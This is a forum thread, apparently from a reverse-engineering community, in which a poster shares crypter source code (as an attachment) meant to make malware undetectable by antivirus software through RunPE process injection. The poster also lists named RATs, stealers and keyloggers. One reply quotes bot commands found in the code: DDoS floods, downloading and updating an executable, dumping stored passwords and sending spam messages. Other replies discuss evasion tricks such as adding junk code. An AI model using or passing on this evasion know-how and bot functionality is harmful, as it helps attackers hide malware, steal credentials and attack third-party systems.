Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Crypter overview

cipher
cipher
in Malware Reverse Engineering

Featured Replies

Posted

hello

i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses.

These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi.

Examples :

1) RATS : cybergate,Blackshades,pixel,spynet,darkcomet etc

2) STEALERS : Istealer v6.0(latest),Albertino,maya password stealer etc

3) KEYLOGGERS : Albertino , Rapzo ,Irtech etc

4) Crypters : icrypt , galaxy ,balckout AIO,demon ,cypherx(www.crypters.net) etc.

The sample crypter source code is attached here .

CodingNation_Crypter_Source.rar

  • 2 months later...

thanks :)

http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801
http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813

i think the below code must not be present in a crypter project this makes it behave like a bot


hello [login]
.bai [logout]
.removeAll [removes ALL bots]DDoS CMDs./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful might destroy botsDownload/Update./download (http://site.com/file.exe C:\file.exe 1)
./update (????)MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)
  • 2 months later...

check it..................

@Cipher : Thanks Mate, but old guddys i played with them when I was learning CEH. This guddys are no more, for example in our team ICA, we dont use like this.

Try the self mod version of Fly Crypter.

And also nice name collection of RAT's.

@ksanket : These codes are not used to make behave like a bot, this codes are part of Trojan or stealer's.

  • 1 month later...
  • Author

@Blue indian : i guess you are talking about polymorphic engine , but still 99% of the crypters in market uses the same PE injection technique.

i Dunno much about the polymorphic engine tho still they manage to make it FUD by adding junk code , by changing the variable names and by some advanced techniques.

  • 1 year later...

Thanks for share friend you is rox !! nice Cryter's collection


Create an account or sign in to comment

Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.